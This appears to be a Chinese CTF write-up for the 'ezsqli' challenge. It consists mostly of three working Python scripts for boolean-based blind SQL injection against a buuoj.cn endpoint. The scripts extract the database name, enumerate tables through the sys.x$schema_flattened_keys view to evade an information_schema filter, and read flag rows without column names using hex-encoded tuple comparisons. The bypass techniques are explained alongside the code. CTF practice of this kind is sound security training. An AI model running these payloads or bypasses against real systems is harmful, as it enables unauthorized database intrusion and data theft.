ezsqli

xvexi)kaixve

爆库

give_grandpa_pa_pa_pa

import requests
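url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
# Substring that shows up in the page when the injected condition is true
# (observed on this target; the page itself is not inspected further here).
TRUE_MARKER = "V&N"
# SQL expression whose value is read out one character at a time.
# Expressions used at the other stages of the challenge, kept for reference:
#   (select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))
#   (select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag'))
#   (select/**/group_concat(flag)from(ctf.flag))
TARGET_EXPR = "database()"
# The original sent every request without a timeout, so one stalled
# connection hung the whole extraction.
TIMEOUT = 10


def make_oracle(session, target_url, expr, marker=TRUE_MARKER, timeout=TIMEOUT):
    """Build a boolean oracle for `expr` against the vulnerable endpoint.

    The returned callable takes (pos, mid) and answers whether the character
    at 1-based position `pos` of `expr` has an ASCII code greater than `mid`.
    The payload `1+(cond)` makes the numeric id 2 when the condition holds,
    which is what flips the presence of `marker` in the response.

    Args:
        session: a requests.Session (or any object with a compatible .post).
        target_url: the injectable endpoint.
        expr: SQL expression to extract; inserted verbatim into the payload.
        marker: response substring that indicates the condition was true.
        timeout: per-request timeout in seconds.
    """
    def oracle(pos, mid):
        payload = "1+(ascii(substr(%s,%d,1))>%d)" % (expr, pos, mid)
        r = session.post(target_url, data={"id": payload}, timeout=timeout)
        r.encoding = "utf-8"
        return marker in r.text
    return oracle


def search_char(oracle, pos, low=32, high=127):
    """Binary-search the ASCII code of character `pos` via `oracle(pos, mid)`.

    Invariant: the code lies in [low, high).  Returns `low` (32 by default)
    when the oracle never answers true -- which is the case when `pos` is past
    the end of the string (ascii('') is 0), but also when the character really
    is a space, so a space in the data terminates extraction early.
    """
    while low < high:
        mid = (low + high) >> 1
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def extract(oracle, *, verbose=True):
    """Read the target string character by character and return it.

    Each position costs about 7 requests (binary search over 32..126).
    Stops at the first position that resolves to 32 (end of string or a
    literal space -- see search_char).  With `verbose` the partial result is
    printed after every character, as the original script did.
    """
    chars = []
    pos = 1
    while True:
        code = search_char(oracle, pos)
        if code == 32:
            break
        chars.append(chr(code))
        if verbose:
            print("".join(chars))
        pos += 1
    return "".join(chars)


if __name__ == "__main__":
    # `requests` is imported at the top of the file.
    with requests.Session() as session:
        result = extract(make_oracle(session, url, TARGET_EXPR))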

爆表

information_schema被禁用了

然后看了大佬的 wp，发现 sys 库里还有一个可用的视图 sys.x$schema_flattened_keys 可以用来爆表名。过滤掉的只是请求里的 information_schema 字符串，而 sys 视图在服务端内部读的仍然是 information_schema（据其定义来自 information_schema.statistics），所以能绕过。注意它只会列出建有索引（含主键）的表，没有任何索引的表不会出现，因此拿到的并不一定是完整的表清单；另外需要 MySQL 5.7+ 才有 sys 库。

select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database())

发现两张表:

f1ag_1s_h3r3_hhhhh,users233333333333333

import requests
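url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
# Substring that shows up in the page when the injected condition is true
# (observed on this target; the page itself is not inspected further here).
TRUE_MARKER = "V&N"
# information_schema is filtered on this target, so table names are read from
# the sys view instead (the filter only matches the request string; the view
# itself is evaluated server-side).  group_concat output is truncated at
# group_concat_max_len (default 1024) -- enough for two table names.
TARGET_EXPR = (
    "(select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)"
    "where(table_schema=database()))"
)
# The original sent every request without a timeout, so one stalled
# connection hung the whole extraction.
TIMEOUT = 10


def make_oracle(session, target_url, expr, marker=TRUE_MARKER, timeout=TIMEOUT):
    """Build a boolean oracle for `expr` against the vulnerable endpoint.

    The returned callable takes (pos, mid) and answers whether the character
    at 1-based position `pos` of `expr` has an ASCII code greater than `mid`.
    The payload `1+(cond)` makes the numeric id 2 when the condition holds,
    which is what flips the presence of `marker` in the response.

    Args:
        session: a requests.Session (or any object with a compatible .post).
        target_url: the injectable endpoint.
        expr: SQL expression to extract; inserted verbatim into the payload.
        marker: response substring that indicates the condition was true.
        timeout: per-request timeout in seconds.
    """
    def oracle(pos, mid):
        payload = "1+(ascii(substr(%s,%d,1))>%d)" % (expr, pos, mid)
        r = session.post(target_url, data={"id": payload}, timeout=timeout)
        r.encoding = "utf-8"
        return marker in r.text
    return oracle


def search_char(oracle, pos, low=32, high=127):
    """Binary-search the ASCII code of character `pos` via `oracle(pos, mid)`.

    Invariant: the code lies in [low, high).  Returns `low` (32 by default)
    when the oracle never answers true -- which is the case when `pos` is past
    the end of the string (ascii('') is 0), but also when the character really
    is a space, so a space in the data terminates extraction early.
    """
    while low < high:
        mid = (low + high) >> 1
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def extract(oracle, *, verbose=True):
    """Read the target string character by character and return it.

    Each position costs about 7 requests (binary search over 32..126).
    Stops at the first position that resolves to 32 (end of string or a
    literal space -- see search_char).  With `verbose` the partial result is
    printed after every character, as the original script did.
    """
    chars = []
    pos = 1
    while True:
        code = search_char(oracle, pos)
        if code == 32:
            break
        chars.append(chr(code))
        if verbose:
            print("".join(chars))
        pos += 1
    return "".join(chars)


if __name__ == "__main__":
    # `requests` is imported at the top of the file.
    with requests.Session() as session:
        result = extract(make_oracle(session, url, TARGET_EXPR))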

image-20200429002022228

直接爆字段

无列名爆字段，学到了。至于列数怎么得到：一般做法是先试出来——用 `(select 1,2)>(select * from 表 limit 0,1)` 这类比较时，左右两边列数不一致 MySQL 会直接报 "Operand should contain N column(s)" 错误，页面返回和真/假两种情况都不一样；从 1 列开始递增，直到不再报错，就是表的列数（这里是 2 列，所以左边写 `select 1,xxx`）。

抄了大师傅的链接: http://www.gem-love.com/ctf/1782.html

学到新姿势：用字符串比较来爆破。把前缀 + 猜测字符编码成 0x 十六进制字面量（避免引号被过滤），和目标行整体比较，第一个让比较结果为"大于"的字符的前一个就是正确字符。注意这种比较受列的排序规则影响：*_ci 排序规则不区分大小写，PAD SPACE 类排序规则会忽略尾部空格，所以爆出来的大小写和字符串结尾可能需要人工确认。

# -*- coding: utf-8 -*-
import requests
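def to_hex(str):  # parameter name kept for existing callers; it shadows the builtin
    """Encode a string as a MySQL hex literal (`0x...`) so the payload needs no quotes.

    Each character contributes the two-digit hex of its code point, e.g.
    to_hex("ab") == "0x6162".  The original used hex(ord(c)) without zero
    padding, so a code point below 16 produced a single digit and shifted every
    following byte; "{:02x}" fixes that.  Code points above 0xff (and the UTF-8
    bytes of a multi-byte column) are not handled -- this targets ASCII data.
    """
    return "0x" + "".join("{:02x}".format(ord(c)) for c in str)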
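url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
# Substring that shows up in the page when the injected condition is true.
TRUE_MARKER = "V&N"
TABLE = "f1ag_1s_h3r3_hhhhh"
ROW = 2           # 0-based row index used in `limit ROW,1`
MAX_LEN = 100     # upper bound on the extracted length (the original `cont`)
# The original sent every request without a timeout.
TIMEOUT = 10


def make_row_oracle(session, target_url, table=TABLE, row=ROW,
                    marker=TRUE_MARKER, timeout=TIMEOUT):
    """Return oracle(candidate) -> True when (1, candidate) sorts after the target row.

    Column names are unknown, so the whole row is compared as a tuple against
    `(select 1, 0x...)`; the tuple width (2 here) must equal the table's column
    count or MySQL raises an operand-count error.  `candidate` is hex-encoded
    with to_hex (defined above) so the payload contains no quotes.
    """
    def oracle(candidate):
        payload = "1+((select 1,{})>(select * from {} limit {},1))".format(
            to_hex(candidate), table, row)
        r = session.post(target_url, data={"id": payload}, timeout=timeout)
        r.encoding = "utf-8"
        return marker in r.text
    return oracle


def next_char(oracle, prefix):
    """Find the character following `prefix`, or None when the string is complete.

    Candidates are tried in ascending order; the first one that makes
    prefix+candidate sort after the target means the *previous* candidate is
    the correct character.  Two fixes over the original loop:
      * if even the lowest candidate (space) sorts after the target, `prefix`
        already is the whole string -- the original appended chr(31) and kept
        going until `cont` ran out;
      * the range now includes '~' (126), otherwise a '}' (125) -- the last
        character of every flag -- could never be found and the original
        looped forever.
    If no candidate sorts after the target the next character is outside the
    printable range and we stop as well.  Under a PAD SPACE collation the end
    of the string shows up as a run of spaces instead; check the output.
    """
    for code in range(32, 127):
        if oracle(prefix + chr(code)):
            return None if code == 32 else chr(code - 1)
    return None


def extract(oracle, max_len=MAX_LEN, *, verbose=True):
    """Read the target row value character by character and return it.

    Each character costs up to 95 requests (linear scan over 32..126).
    Stops when next_char reports the end or after `max_len` characters.
    """
    out = ""
    while len(out) < max_len:
        ch = next_char(oracle, out)
        if ch is None:
            break
        out += ch
        if verbose:
            print(out)
    return out


if __name__ == "__main__":
    # `requests` is imported at the top of the file.
    with requests.Session() as session:
        result = extract(make_row_oracle(session, url))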

image-20200429020023423